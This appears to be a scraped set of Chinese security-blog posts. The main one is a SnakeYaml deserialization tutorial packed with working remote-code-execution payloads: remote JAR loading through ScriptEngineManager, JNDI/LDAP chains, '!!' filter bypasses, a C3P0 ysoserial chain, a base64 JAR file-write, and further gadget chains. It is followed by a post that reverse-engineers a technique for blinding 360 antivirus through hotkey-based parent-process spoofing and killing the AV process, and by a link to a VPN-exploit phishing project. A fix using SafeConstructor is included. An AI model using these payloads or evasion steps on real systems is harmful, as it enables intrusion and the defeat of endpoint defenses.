推荐一个yml文件转yaml字符串的地址，网上部分POC是通过yml文件进行本地测试的，实战可能用到的更多的是yaml字符串。https://www.345tool.com/zh-hans/formatter/yaml-formatter

转换流程图

SnakeYaml 使用

环境搭建

在Maven项目中的pom.xml文件添加依赖:

<dependency>    <groupId>org.yamlgroupId>    <artifactId>snakeyamlartifactId>    <version>1.27version>dependency>

常用方法

String    dump(Object data)将Java对象序列化为YAML字符串.
void    dump(Object data, Writer output)将Java对象序列化为YAML流.
String    dumpAll(Iteratorextends Object> data)将一系列Java对象序列化为YAML字符串.
void    dumpAll(Iteratorextends Object> data, Writer output)将一系列Java对象序列化为YAML流.
String    dumpAs(Object data, Tag rootTag, DumperOptions.FlowStyle flowStyle)将Java对象序列化为YAML字符串.
String    dumpAsMap(Object data)将Java对象序列化为YAML字符串.
 T    load(InputStream io)解析流中唯一的YAML文档, 并生成相应的Java对象.
 T    load(Reader io)解析流中唯一的YAML文档, 并生成相应的Java对象.
 T    load(String yaml)解析字符串中唯一的YAML文档, 并生成相应的Java对象.
Iterable<Object>    loadAll(InputStream yaml)解析流中的所有YAML文档, 并生成相应的Java对象.
Iterable<Object>    loadAll(Reader yaml)解析字符串中的所有YAML文档, 并生成相应的Java对象.
Iterable<Object>    loadAll(String yaml)解析字符串中的所有YAML文档, 并生成相应的Java对象.

序列化与反序列化

主要关注序列化与反序列化

SnakeYaml提供了Yaml.dump()和Yaml.load()两个函数对yaml格式的数据进行序列化和反序列化。

Yaml.load()：入参是一个字符串或者一个文件，经过序列化之后返回一个Java对象；
Yaml.dump()：将一个对象转化为yaml文件形式；

序列化

package org.example;
import org.yaml.snakeyaml.Yaml;
class User {    public String name;
    public void setName(String name) {        this.name = name;    }
    public String getName() {        return name;    }}
public class App {    public static void main( String[] args ){        User user = new User();        user.setName("xiaobei");        Yaml yaml = new Yaml();        String dump = yaml.dump(user);        System.out.println(dump);    }}

这里 !! 用于强制类型转化，!!org.example.User 是将该对象转为org.example.User 类, 如果没有 !! 则就是个 key 为字符串的 Map ，其实这个和Fastjson的@type有着异曲同工之妙，用于指定反序列化的全类名.

反序列化

再来一段反序列化代码，主要是在各个方法中都添加了print，来看一下反序列化时会触发这个类的哪些方法

User.java

package org.example;
public class User {
    String name;    int age;
    public User() {        System.out.println("User构造函数");    }
    public String getName() {        System.out.println("User.getName");        return name;    }
    public void setName(String name) {        System.out.println("User.setName");        this.name = name;    }
    public String getAge() {        System.out.println("User.getAge");        return name;    }
    public void setAge(String name) {        System.out.println("User.setAge");        this.name = name;    }}

App.java

package org.example;
import org.yaml.snakeyaml.Yaml;

public class App {    public static void main( String[] args ){        Deserialize();    }
    public static void Deserialize(){        String s = "!!org.example.User2 {name: xiaobei, age: 18}";        Yaml yaml = new Yaml();        User user = yaml.load(s);
    }}

反序列化过程中会触发setXX方法和构造方法。注意：在反序列化时候必须确保被反序列化对象的类型修饰符为 public ，否则会反序列化爆异常。

Java SPI 机制

简介

Java SPI机制是Java提供的一套用来被第三方实现或者扩展的API，它可以用来启动框架扩展和替换组件。

常见的SPI有JDBC、Spring、Spring Boot相关starter组件、Dubbo、JNDI、日志接口等.

SPI全称Service Provider Interface，是Java提供的一套用来被第三方实现或者扩展的接口，它可以用来启用框架扩展和替换组件。SPI的作用就是为这些被扩展的API寻找服务实现。

API （Application Programming Interface）在大多数情况下，都是实现方制定接口并完成对接口的实现，调用方仅仅依赖接口调用，且无权选择不同实现。从使用人员上来说，API 直接被应用开发人员使用。
SPI （Service Provider Interface）是调用方来制定接口规范，提供给外部来实现，调用方在调用时则选择自己需要的外部实现。从使用人员上来说，SPI 被框架扩展人员使用。

也就是说，SPI是一种服务发现机制，它是通过在CLASSPATH路径下的META-INF/services文件夹查找文件，然后自动加载文件里所定义的类，相当于动态的为某个接口(API)寻找服务实现；也就是说，我们可以通过在META-INF/services下创建一个以服务接口命名的文件，这个文件里面的内容就是这个接口的具体实现类的完整类名，在加载这个接口的时候就会实例化这里面写上的那个类名。

使用介绍

当服务提供者提供了接口的一种具体实现后, 在jar包的META-INF/services目录下创建一个以"包名 + 接口名"为命名的文件，内容为实现该接口的类的名称.
接口实现类所在的jar包放在主程序的classpath中.
主程序通过java.util.ServiceLoder动态装载实现模块，通过在META-INF/services目录下的配置文件找到实现类的类名，利用反射动态把类加载到JVM.

实现原理

程序会通过java.util.ServiceLoader动态装载实现模块，在META-INF/services目录下的配置文件中寻找实现类的类名，再通过Class.forName加载进来，再通过newInstance()来创建对象，并且存到缓存和列表里面。

DataSoure(服务接口)

package MySPI;
public interface DataSource {    void Driver();}

Mysql服务提供者

package MySPI;
public class Mysql implements DataSource{    @Override    public void Driver() {        System.out.println("This is Mysql DataSource");    }}

Oracle服务提供者

package MySPI;
public class Oracle implements DataSource{    @Override    public void Driver() {        System.out.println("This is Oracle DataSource");    }}

Mssql服务提供者

package MySPI;
public class Mssql implements DataSource{    @Override    public void Driver() {        System.out.println("This is Mssql DataSource");    }}

SPIUsage(模拟使用者)

package MySPI;
import java.util.Iterator;import java.util.ServiceLoader;
public class SPIUseage {    public static void main(String[] args) {        ServiceLoader load = ServiceLoader.load(DataSource.class);        Iterator iterator = load.iterator();        while(iterator.hasNext()){            iterator.next().Driver();        }    }}

服务列表文件

需要注意的是这里由于是Maven项目，故我们的META-INF以及serivces文件夹还有服务列表文件都是放到resources目录下。

测试使用

原理分析

跟进 ServiceLoad.load(Class service) 方法, 其先创建一个 ClassLoader ，接着继续调用 ServiceLoad.load(Class service, ClassLoader loader) .

接着创建一个 ServiceLoader 对象

在创建 ServiceLoader 对象时候会调用 reload 方法，在 reload 方法会创建一个 LazyIterator 的实例对象.

在 LazyIterator 对象中有两个参数，分别是:

service: 为要扫描的配置文件名.
loader: 为当前线程的 ClassLoader .

返回一个 LazyIterator 的实例，如其名字一样，这是一个延迟加载的迭代器，然后返回到主函数我们进行迭代。

在遍历对象前我们会先通过hasNext方法判断是否存在

跟入java.util.ServiceLoader.LazyIterator#hasNext方法

这里的java.util.ServiceLoader#parse方法完成服务提供者的解析

可以看到实际上就是解析每行获得的服务提供者。

下面我们看一下实际调用时候的流程

其实就是读取 META-INF/services/包名.接口名文件，然后遍历文件中每一个实现了服务接口的服务提供者类名，通过反射创建实例对象，并存到服务提供者列表里面。流程下来我们知道了如果 load 可控加载恶意的接口实现类。然后控制 Jar 包中的 META-INF/services 目录中的SPI配置文件，我们就可以服务器通过SPI机制调用恶意类达到恶意代码执行的效果。

RCE Demo

如果服务提供者的接口中存在RCE，则我们跌倒调用的时候会导致RCE触发。

Snakeyaml的反序列化方式

无构造方法和setter方法

无构造方法和setter方法情况下snakeyaml将使用反射的方式自动赋值。

package com.SnakeYamlSec;
public class ModelA {public int  a;public int b;}

使用如下方法反序列化

Yaml yaml = new Yaml();ModelA a = (ModelA) yaml.load("!!com.SnakeYamlSec.ModelA {a: 5, b: 0}") ;System.out.println(yaml.dump(a));

将反序列化成功。

存在构造方法

package com.SnakeYamlSec;
public class ModelB {    public int a;    public int b;
    public ModelB(int a,int b){        this.a = a;        this.b = b;    }
}

使用如下方式反序列化

ModelB b = (ModelB) yaml.load("!!com.SnakeYamlSec.ModelB [5 , 0 ]") ;System.out.println(yaml.dump(b));

这里的[ ]是调用构造函数的一个标志，在构造函数中下断点，也能够成功调到。

需要注意 snakeyaml 反序列化时，如果类中的成员变量全为私有将会失败（调试得知）。

存在setter方法

package com.SnakeYamlSec;
public class ModelC {    public int a;
    public void setInput(int a){        this.a = a;    }

}

ModelC c = (ModelC) yaml.load("!!com.zlg.SnakeYaml.ModelC {input : 5}") ;System.out.println(yaml.dump(c));

使用此方式在反序列化过程中会调用setter方法，其YAML写法和无构造函数的方式写法差不多，比如要调用setInput函数，把set去掉将后面单词全部小写后，后面值就是传入setInput的参数就可以调用，其实Java中很多组件中都会存在类似操作，即判断目标类的相关属性是否存在setter方法，如果存在优先考虑使用setter方法。

到此为止，意味着snakeyaml可以利用fastjson和Jackson的所有利用链（反之不一定行），并且还没有autotype的限制。

ScriptEngineManager反序列化利用

攻击复现

网上最多的一个PoC就是基于javax.script.ScriptEngineManager的利用链通过URLClassLoader实现的代码执行。Github上已经有现成的利用项目，可以更改好项目代码部署在web上即可。所以说SnakeYaml通常的一个利用条件是需要出网的。该项目中执行的命令在Windows下不适用，我们需要进行需改，比如加一段弹计算器的代码

编译打包

之后在该目录开一个web服务

更改poc

!!javax.script.ScriptEngineManager [  !!java.net.URLClassLoader [[    !!java.net.URL ["http://127.0.0.1:8000/yaml-payload.jar"]  ]]]

收到HTTP请求并成功弹出计算器

调试分析

YAML解析部分

下面调试分析一下整个流程，在yaml.load(s)处下断点

首先通过 StringReader 处理我们传入的字符串，PoC存储在StreamReader的this.stream字段值里。

上面主要是对输入的payload进行赋值与简单处理的操作，之后进入loadFromReader(new StreamReader(yaml), Object.class)方法中，该方法内逻辑如下

首先会对我们传入的payload进行处理，封装成Composer对象。

这里实际上还有一个细节点，那就是new ParserImpl的操作

这里注意 !! -> tag:yaml.org,2002: 后续也会对我们传入的 payload 进行字符串替换的操作。

之后调用BaseConstructor#setComposer()方法，对Composer进行赋值，最终进入BaseConstructor#getSingleData(type)方法内，跟进后会调用this.composer.getSingleNode()方法对我们传入的payload进行处理，会把!!变成tagxx一类的标识

这个在浅蓝师傅的文章中也有提到过，对于一些yaml常用的set map等类型都是一个tag，属于是在过滤掉 !! 的情况下可以通过这种 tag 形式去进行Bypass，详细的思路可参考浅蓝师傅的文章。

public static final String PREFIX = "tag:yaml.org,2002:";public static final Tag YAML = new Tag("tag:yaml.org,2002:yaml");public static final Tag MERGE = new Tag("tag:yaml.org,2002:merge");public static final Tag SET = new Tag("tag:yaml.org,2002:set");public static final Tag PAIRS = new Tag("tag:yaml.org,2002:pairs");public static final Tag OMAP = new Tag("tag:yaml.org,2002:omap");public static final Tag BINARY = new Tag("tag:yaml.org,2002:binary");public static final Tag INT = new Tag("tag:yaml.org,2002:int");public static final Tag FLOAT = new Tag("tag:yaml.org,2002:float");public static final Tag TIMESTAMP = new Tag("tag:yaml.org,2002:timestamp");public static final Tag BOOL = new Tag("tag:yaml.org,2002:bool");public static final Tag NULL = new Tag("tag:yaml.org,2002:null");public static final Tag STR = new Tag("tag:yaml.org,2002:str");public static final Tag SEQ = new Tag("tag:yaml.org,2002:seq");public static final Tag MAP = new Tag("tag:yaml.org,2002:map");

而 tag 具体的替换以及整个payload重新组合的逻辑在ParserImpl#parseNode()方法中。

继续回到 loadFromReader 跟进到constructor.getSingleData

具体的处理逻辑比较复杂，调试起来也比较费劲，而且它是一位一位进行处理，所以说这里我就把具体的处理过程跳过了，简单放张截图

然后调用 constructDocument ，跟进 constructDocument ，会调用constructObject来获取一个Object对象

跟进该方法, 进一步调用 constructObjectNoCheck .

跟进 constructObjectNoCheck 方法.

接着跟进construct.construct方法

这里会调用 this.getConstructor

这里getConstructor方法所做的事情就是获取类的构造方法

跟进去发现继续调用 getClassForNode ，在该方法中获取了name的值为javax.script.ScriptEngineManager，然后调用getClassForName对name进行传入获取cl的class对象

跟进 getClassForName ，在这里使用反射创建了一个javax.script.ScriptEngineManager对象的具体实现.

接着回到上面的 construct 处继续分析

这里调用完 getContructor 方法后将调用该返回对象的 construct 方法，继续跟进

该 constructor 方法逻辑如上图所示，注意这里 Constructor.this.newInstance 方法调用

远程恶意对象创建

在 newInstance 方法中会获取 node 的类型(这里就是我们自定义类型)，然后通过反射获取该类的构造方法，然后设置访问权限并提供构造方法创建实例对象，底层使用的是Java反射机制，这里直接看反射调用的方法public javax.script.ScriptEngineManager(java.lang.ClassLoader)

这里调用了return getServiceLoader(loader);，接着就是ServiceLoader.load()，对我们自定义的服务(SPI)加载器进行初始化，可以看到这部分就是SPI机制的实现

这时候我们再看Github下载的Payload项目，可以发现这个项目实际上就是一个实现了ScriptEngineFactory接口的服务提供者，前面分析过，在next方法的时候会解析服务列表文件并创建服务提供者对象实例

回到javax.script.ScriptEngineManager#initEngines方法继续分析，在前面SPI机制中我们分析知道了在next的时候会进行反射加载服务提供者，我们只需要在此处下断即可

最后有一个细节点那就是真正发起请求这个Payload Jar的操作实际上是在java.util.ServiceLoader.LazyIterator#hasNextService方法中的parse(service, configs.nextElement());调用中进行的，此时的loader是一个UrlClassLoader，前面分析SPI机制流程的时候有说明在parse方法中才会进行服务列表文件的读取解析，也就是发生请求的地方

总结

整个调试下来感觉有点类似于在调 Fastjson ，前面一小半的部分是在做一些payload的处理，涉及到一些变量，比如tag、node、type这些，以及SnakeYaml内部对于 !! 去转换为tag这类的操作，然后就是一些数据的流向，需要仔细观察；后半部分就是整个漏洞的一个触发，整体的一个思路就是先反射构造对象。

在构造时候会触发该类的构造方法、 set系列方法，所以，通常我们将命令执行代码写在构造函数内。

如果是利用ScriptEngineManager手法加载远程JAR的话流程就是分别获取ScriptEngineManager、URLClassLoader、URL的class对象，之后在construct方法内最终分别实例化了URL、URLClassLoader、ScriptEngineManager来造成远程代码执行。

漏洞修复

这个漏洞涉及全版本，只要反序列化内容可控,那么就可以去进行反序列化攻击

修复方案：加入new SafeConstructor()类进行过滤

package Snake;import org.yaml.snakeyaml.Yaml;import org.yaml.snakeyaml.constructor.SafeConstructor;public class snaketest {    public static void main(String[] args) {        String context = "!!javax.script.ScriptEngineManager [\n" +                "  !!java.net.URLClassLoader [[\n" +                "    !!java.net.URL [\"http://127.0.0.1:9000/yaml-payload.jar\"]\n" +                "  ]]\n" +                "]";        Yaml yaml = new Yaml(new SafeConstructor());        yaml.load(context);    }}

JdbcRowSetImpl

!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'ldap://127.0.0.1:9999/Evil', autoCommit: true}

JNDI注入

首先本地生成恶意字节码并监听生成远程恶意类地址

使用marshalsec创建ldap服务引用远程恶意类

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8000/#calc 9999

POC

package com.yamlAttack;
import org.yaml.snakeyaml.Yaml;
public class SnakeYamlGadgets{    public static void main( String[] args ){        Yaml yaml=new Yaml();        yaml.load("!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: 'ldap://127.0.0.1:9999/Evil', autoCommit: true}");    }}

原理分析

这条反序列化链的原理和Fastjson中的JdbcRowSetImpl链基本上一模一样，都是因为反序列化还原会调用对象setter方法，这里反序列化调用setAutoCommit方法进而执行connect操作接着实现JNDI注入。

绕过!!被过滤

使用等价字符替换

! [    !!java.net.URLClassLoader [[        !!java.net.URL ["http://127.0.0.1:8000/yaml-payload.jar"]    ]]]

import org.yaml.snakeyaml.Yaml;
public class ByPass {    public static void main(String[] args) {        Yaml yaml=new Yaml();        String payload="! [\n" +                "  !!java.net.URLClassLoader [[\n" +                "    !!java.net.URL [\"http://127.0.0.1:8000/yaml-payload.jar\"]\n" +                "  ]]\n" +                "]";        yaml.load(payload);    }}

自定义Tag前缀

%TAG !      tag:yaml.org,2002:---!javax.script.ScriptEngineManager [    !!java.net.URLClassLoader [[        !!java.net.URL ["http://127.0.0.1:8000/yaml-payload.jar"]    ]]]// 记得不要漏了---

import org.yaml.snakeyaml.Yaml;
public class ByPass {    public static void main(String[] args) {        Yaml yaml=new Yaml();        // 定义!代表tag:yaml.org,2002:        String payload="%TAG !      tag:yaml.org,2002:\n"+                "---\n"+                "!javax.script.ScriptEngineManager [\n" +                "  !!java.net.URLClassLoader [[\n" +                "    !!java.net.URL [\"http://127.0.0.1:8000/yaml-payload.jar\"]\n" +                "  ]]\n" +                "]";        yaml.load(payload);    }}

参考

https://yaml.org/spec/1.1/#id858600

不出网情况

C3P0链

Fastjson中可以用C3P0.WrapperConnectionPoolDataSource对HEX序列化字节码进而实现本地调用，snakeyaml同理。

// CommonsCollections5为反序列化链,具体情况视目标环境而定java -jar ysoserial-0.0.5.jar CommonsCollections5 "calc" > 1.txt

将字节码文件转为16进制，传入payload中，即可进行恶意字节码加载

!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSourceuserOverridesAsString: 'HexAsciiSerializedMap:16进制数据;'

POC

public class SnakeYaml {    public static void main(String[] args) {        String payload = "!!com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\n" +                "userOverridesAsString: 'HexAsciiSerializedMap:16进制数据;'";        Yaml yaml = new Yaml();        yaml.load(payload);    }}

本地写入Jar实现加载Payload

其实snakeyaml和fastjson基本上差不多，只是序列化数据表现形式存在区别，不过相关特性高度相似，所以fastjson中大部分利用链都可以转化为snakeyaml形式

{  "@type": "java.lang.AutoCloseable",  "@type": "sun.rmi.server.MarshalOutputStream",  "out": {    "@type": "java.util.zip.InflaterOutputStream",    "out": {      "@type": "java.io.FileOutputStream",      "file": "dst",      "append": "false"    },    "infl": {      "input": "eJwL8nUyNDJSyCxWyEgtSgUAHKUENw=="    },    "bufLen": 1048576  },  "protocolVersion": 1}

Payload

!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File ["filePath"],false],!!java.util.zip.Inflater  { input: !!binary base64 },1048576]]

filepath是写入路径，base64是我们要写入文件的base64编码

package snakeYaml;
import org.yaml.snakeyaml.Yaml;
public class SnakeYaml {    public static void main(String[] args) {        String payload = "!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File [\"./yaml-payload.jar\"],false],!!java.util.zip.Inflater  { input: !!binary eJwL8GZmEWHg4OBg0KvLDmVAApwMLAy+riGOup5+bvr/TjEwMDMEeLNzgKSYoEoCcGoWAWK4Zl9HP0831+AQPV+3z75nTvt46+pd5PXW1Tp35vzmIIMrxg+eFul5+ep4+l4sXcXCGfFC8sjsmVoZP8RV1Z4v0bJ4Li76RFx1GsPU7E9FH4sYwY7Q/nDiuDPQCheoI7gYGIAOE6hFdQRQlCGxqKS4ICc/s0Qf4VhdNMdqoahzLE8tzs9NDU4uyiwocc1Lz8xLdUtMLskvqtRLzkksLu4NjvUXdhSxDc6K9m4MshMRcXTVUFij1NXZ0iLgwePao/rjQfdho5Xdb/M2W69+ejH+8ep9Cz4elH/QH3Q+JytW90LaZOPq93N+1z4/fj7/PuOaB4VikiKbZxyuYeN+tmf2sSSx6RumtE09ttfkHfeSazLXL75msj26k7nxybLyJSxsXn2r57VudX76/vRhLdPaVN2323dvkjs5sdk1S9srf6eo8zTTTW3dxUuTf/pFhb4MW7Ppm+z2Ty4K9xfJatgX2GzPvHnhlGmSQsCPZMms5VlT5zhcfld0c+WOoHa72PNbBK/dcl57WcP9/G4/37fzr4jKpmvMevLD+sB9oZsL15h81j1isvZKT/PzS+qO2vdZ8vqF1xe9/xBxU+22onDES/N7F5etCTutvm4ab+Nc4zO3Tdfr9V18tcSzQv/K14BiuairU1Zbp9/YdG7WqZr1h26xpHXfZTOt1b69LzifLzBhkWVPm6hLlXZdLtPUvRe2X92WHJZe9Hgv155ZXcXblq61/Z9y0uKkYvc9k2nFFQ2i6xbori7j4//Yodu7qdDm9ct7YYfDSs8yPt3QFdeY+fL1grivMrlz389f/f3/ApZl587uSTX9cf2V64us42+6MuO8JX6mX5ydJTYvhDd19r24O1F8B8McE6qiny/tk7u+Tz+3dbbH57tF3392/K7YZH5EZul1jw/Mbs/3O9S4LrpQ3PXkdP+JKWJ+E3/5hE0Sq7T7wOKfIKOZNO2WzFPGe18SBf5KPIy3z//k8Uepw+Q9x08VW55FF3rMzgV/8OnwdxGs9HGdlfgoQHyP4SODxapWH/ISrrwobL10Ve/H9uQ/G/V+HJWo39O9R7zz+q4HusLrk5WOec85GX2U/ZqF5GPV80/WCi63+O/3z+zFe7HdFzq3+845Nrev9I1A+iK+s//YQBli0nwe/YnAbGnLhpwr0TOEJrEJPSuxLHHtlMDsQwYCx+//1mzyF3Xb53D8xg0ZnpJTWtX2jwMXZwpNWp0tWfd96dVzVjKbblZnBBX9vPv/3a3NCmYTFJnd72kpa3YqzYx+3LE2kVv1+yFPb5vcaRPPLTn2ZNFxYw6jdVaFTy59mP5yhUiGp1RtVdiEkBod29g0fwf2g3qdORsDggwWHqj+9qHx3pMKNxZuh1bLrE9v7nxMF9mYwH7r/ZwKiZibB1fsPGH1LSxjkuUnnpcbettlvEU+OjQINSd+ersvmcljTcQdTfbDD/kVil4vWTbFqf0Zn8uDUoGL/27qfL+sa6U+/YavytIC62THc3bd4StES5MslhzKXMa9dJL95XsXfy749f/Aruvbq1/FNutylvZ++WuovpDz86mk/hO7usIf9KXKNJ/r+iD7/eq0aeWlycu6TblWTTQucJRZ2M2faBbxdUFJ0xaj0+4BWmtNHG9eOptUe3nX07d9xXJuwc+qO6x1T4h9fe9y1iDj8KTKSYmfHOVXnp1z0unso8Vl99t2KzWf01jVXHJff2uleC0jKF5zNSwPNTIyMDxgRS7oajelo8SrEHJpW5xaVJaZnFqMVOA57J7gh6zeCKt6UKRX6BWDk4MellThraOlqXfi5Hmdi8U6/rrnzvvy+umd0tEoPOt9/ox3qbeP3kn9VSzg4nkCv5GgGtAOFXDxzMgkwoBaS8DqD1AVgwpQKhx0rcilvgiKNlsc1Q3IBC4G3LUDAhxCqysQNoNqC+TspYWi7xVJdQeyuSD3IEevJoq5l5lJyKrI3sSWNhBgNSv2lIJwFiitIMefEYr+21j1E0o5Ad6sbCDd7EDIAgzGRDAPAKHhEQ4= },1048576]]\n";        Yaml yaml = new Yaml();        yaml.load(payload);    }}

写入本地之后就可以通过ScriptEngineManager方式进行本地读取了

public class SnakeYaml {    public static void main(String[] args) {        String payload = "!!javax.script.ScriptEngineManager [\n" +                "  !!java.net.URLClassLoader [[\n" +                "    !!java.net.URL [\"file:///yaml-payload.jar\"]\n" +                "  ]]\n" +                "]";        Yaml yaml = new Yaml();        yaml.load(payload);    }}

整体思路其实就是一套组合拳，核心利用链还是前面的ScriptEngineManager。

Other Gadgets

以下利用链来自于Sentiment师傅文章。

Spring PropertyPathFactoryBean

依赖

<dependency>    <groupId>org.springframeworkgroupId>    <artifactId>spring-beansartifactId>    <version>5.3.23version>dependency><dependency>    <groupId>org.springframeworkgroupId>    <artifactId>spring-contextartifactId>    <version>5.3.23version>dependency>

POC

public static void main(String[] args) throws Error ,Exception{    String poc = "!!javax.management.BadAttributeValueExpException [!!org.apache.xbean.naming.context.ContextUtil$ReadOnlyBinding [\"foo\",!!javax.naming.Reference [foo, \"Exec\", \"http://localhost:7777/\"],!!org.apache.xbean.naming.context.WritableContext []]]";    Yaml yaml = new Yaml();    yaml.load(poc);}

Apache Commons Configuration

依赖

<dependency>    <groupId>commons-configurationgroupId>    <artifactId>commons-configurationartifactId>    <version>1.10version>dependency>

POC

public static void main(String[] args) throws Error ,Exception{    String poc = "\n" +            "    ? !!org.apache.commons.configuration.ConfigurationMap [!!org.apache.commons.configuration.JNDIConfiguration [!!javax.naming.InitialContext [], \"ldap://localhost:9999/Execs\"]]";    Yaml yaml = new Yaml();    yaml.load(poc);}

C3P0 JndiRefForwardingDataSource

public static void main(String[] args) throws Error ,Exception{        String poc = "!!com.mchange.v2.c3p0.JndiRefForwardingDataSource\n" +            "  jndiName: \"ldap://localhost:9999/Exec\"\n" +            "  loginTimeout: 0";    Yaml yaml = new Yaml();    yaml.load(poc);}

Resource

依赖

    org.eclipse.jetty    jetty-jndi    9.4.8.v20171121    org.eclipse.jetty    jetty-plus    9.4.8.v20171121    org.eclipse.jetty    jetty-util    9.4.8.v20171121

POC

public static void main(String[] args) throws Error ,Exception{    String poc = "[!!org.eclipse.jetty.plus.jndi.Resource [\"__/obj\", !!javax.naming.Reference [\"foo\", \"Exec\", \"http://localhost:7777/\"]], !!org.eclipse.jetty.plus.jndi.Resource [\"obj/test\", !!java.lang.Object []]]\n";    Yaml yaml = new Yaml();    yaml.load(poc);}

其它可能切入点

Context接口子类DataSource接口子类javax.naming.spi.ObjectFactory子类
com.sun.jndi.ldap.LdapReferralContext#LdapReferralContextcom.sun.jndi.ldap.LdapCtx#LdapCtx(java.lang.String, java.lang.String, int, java.util.Hashtable, boolean)javax.naming.ldap.InitialLdapContext#InitialLdapContext(java.util.Hashtable, javax.naming.ldap.Control[])com.sun.jndi.cosnaming.CNCtx#CNCtx(java.util.Hashtable)com.sun.jndi.rmi.registry.RegistryContext#RegistryContext(java.lang.String, int, java.util.Hashtable)

参考

总结使用SnakeYAML解析与序列化YAML相关__小鱼塘的博客-CSDN博客_snakeyaml用法

Java安全之SnakeYaml反序列化分析 - nice_0e3 - 博客园

Java SnakeYaml反序列化漏洞 | s1mple

Java SnakeYaml反序列化学习 - R0ser1 - 博客园

Java常用机制 - SPI机制详解 | Java 全栈知识体系

Java安全之SnakeYaml反序列化分析 - 跳跳糖

Java SnakeYaml反序列化 · BlBana's BlackHouse

SnakeYaml反序列化及不出网利用

Java安全之SnakeYaml反序列化分析

Java-SnakeYaml反序列化漏洞

理解的Java中SPI机制

阅读原文

跳转微信打开

Bypass360核晶_致盲edr

Thu, 31 Aug 2023 16:10:00 +0800

原创 41group-Se1fx0 2023-08-31 16:10 安徽

点进问题反馈，搞⼀搞信息收集。⼈家都说了开了虚拟化相关的软件将限制核晶发挥。那我们就挖⼀些相关软件进⾏利⽤测

点进问题反馈，搞⼀搞信息收集。

⼈家都说了开了虚拟化相关的软件将限制核晶发挥。

那我们就挖⼀些相关软件进⾏利⽤测试。

早些时候有⼈⽤Vmware的exe进⾏测试，遇到了进程链检测的问题。如果是⼿动点击启动的带虚拟化功能的相关exe，核晶将进⼊“⾃适应”状态，此时的⽗进程是explorer.exe；如果通过⾃⼰的⽊⻢或是什么东⻄使⽤诸如CreateProcess或ShellExecute等常规⽅法则会爆出弹窗。

之后开始使⽤exlorer.exe start xxx.exe来过⽗进程检测不久之后⼜被拦截；在之后就把explorer.exe的资源做替换名字修改来过⽗进程不久之后⼜被拦截；在之后不仅替换资源⼜加了upx壳不久后⼜不好使了；以上操作不在此⼀⼀展示。最近拿到了⼀个样本，对其进⾏逆向分析后发现新的办法！

先使⽤IDA静态分析⼤致看下运⾏逻辑。

很明显dllmain直接就启动了⼀个线程。很显然这么做并不合适，因为会导致线程死锁导致线程没法继续往下⾛。

再去看看导出函数。

⼤致看了下，run函数是我们想要的内容。

也是启动⼀个线程。

跟进线程起始地址分析代码。可以看到它先是sleep⼀下就检测⼀个字符串指针指向地址处的字符串⻓度，若⻓度不为12就往0地址处复制内存，显然这样会触发内存读写异常导致程序崩溃，此处⼜⼀处暗桩。然后就向C:\ProgramData⽬录释放可能占⽤VT的exe。

让我们来看看这个wegame.exe是怎么启动并绕过进程链检测的。

先是执⾏了sub_10001100函数，之后找到窗⼝类Shell_TrayWnd使⽤PostMessageW发送10次特定消息，然后模拟键盘事件Ctrl+Alt+A（推测此处是某快捷键），之后在sub_10001000函数返回为0的前提下继续模拟键盘事件。我们来看看这两个函数到底做了什么。

第⼀个函数⼜跳到了sub_10001110，它遍历了进程链表，找到qq.exe并使⽤TerminateProcess终结qq.exe。推测可能是qq的快捷键占⽤了Ctrl+Alt+A。

第⼆个函数则是判断wegame.exe是否已经运⾏。

⾃此我们已经看过wegame的启动过程，现在动态调试来看⼀下。不过在此之前我们需要patch掉原有的俩暗桩。

⾸先是dllmain我们不能让他启动线程，所以将此处跳转改为强制跳转。

同理此处也改为强制跳转。

然后写个exe来辅助调试这个dll⽂件。

载⼊运⾏直接就来到了我们的int 3断点。

nop掉继续往下⾛找到jmp地址。

从CreateThread的参数找到run函数地址并下断点。

运⾏成功来到断点往下执⾏，执⾏完向窗⼝类的Shell_TrayWnd的PostMessageW后，此时⽂件已经释放，⽽且还注册了快捷键。

之后通过keybd_event模拟快捷键启动wegame.exe，⽗进程explorer。这种就相当于explorer启动的wegame.exe，进程链⽆从查起。

打开某数字发现已经“⾃适应”。

之后找到某数字窗⼝类发送WM_QUIT消息kill掉进程。

为了详细了解这⼀过程我们继续分析explorer.exe创建进程的过程。调试它并对NtCreateUserProcess下断点，⼿动执⾏快捷键触发断点，开来已经来到正确位置。

查看调⽤栈。

最后可简化为

SHELL32!HDXA_LetHandlerProcessCommandEx+0x10cSHELL32!CDefFolderMenu::InvokeCommand+0x13d shlwapi!SHInvokeCommandOnContextMenu2+0x1f2shlwapi!SHInvokeCommandWithFlagsAndSite+0xb4shlwapi!SHInvokeDefaultCommand+0x21 Explorer!_ExecItemByPidls+0x85 Explorer!CTray::_HotkeySearchFailed+0xd5Explorer!CTray::v_WndProc+0xb96 Explorer!CImpWndProc::s_WndProc+0x78user32!UserCallWinProcCheckWow+0x2f8user32!CallWindowProcW+0x8e

很明显由是由HotkeySearchFailed函数调⽤ExecItemByPidls来执⾏快捷⽅式，这两个函数的后续深度逆向分析在此不做赘述。在IDA⾥对explorer的registerHotKey进⾏交叉引⽤找到这个函数似乎是处理消息的。

往下⾛找到样本发送的Msg值0x4EA、0x4E9。并且当值为0x4E6时也会进⾏注册热键操作。

如0x4E9处sub_140107194->sub_14010656C->RegisterHotKey

更加多样化的利⽤思路就交给⼴⼤⽩帽⼦吧。

ps：想说一句，放眼世界吧。不见下edr不懂啥叫杀软。不对抗下xdr不明白世界有多大。天天就会对抗个某数字能干啥？？

欢迎各位大佬入群交流，需要各种资料也可入群领取。

二维码失效加好友进群！！！！！！！！！！！

群满请加wx入群！！！！！！！

wx：Mathearsion

阅读原文

跳转微信打开

奇某信VPN溢出钓鱼项目分析

Wed, 16 Aug 2023 02:57:00 +0800

原创 41group 2023-08-16 02:57 安徽

bt不想rt活啊，钓鱼下这猛料。今天兄弟又给了个小项目，直接奇xxvpn利用？？？怕了啊，公司瑟瑟发抖htt

bt不想rt活啊，钓鱼下这猛料。今天兄弟又给了个小项目，直接奇xxvpn利用？？？怕了啊，公司瑟瑟发抖

https://github.com/CyberSnakeSec/xaq-vpn-pwn

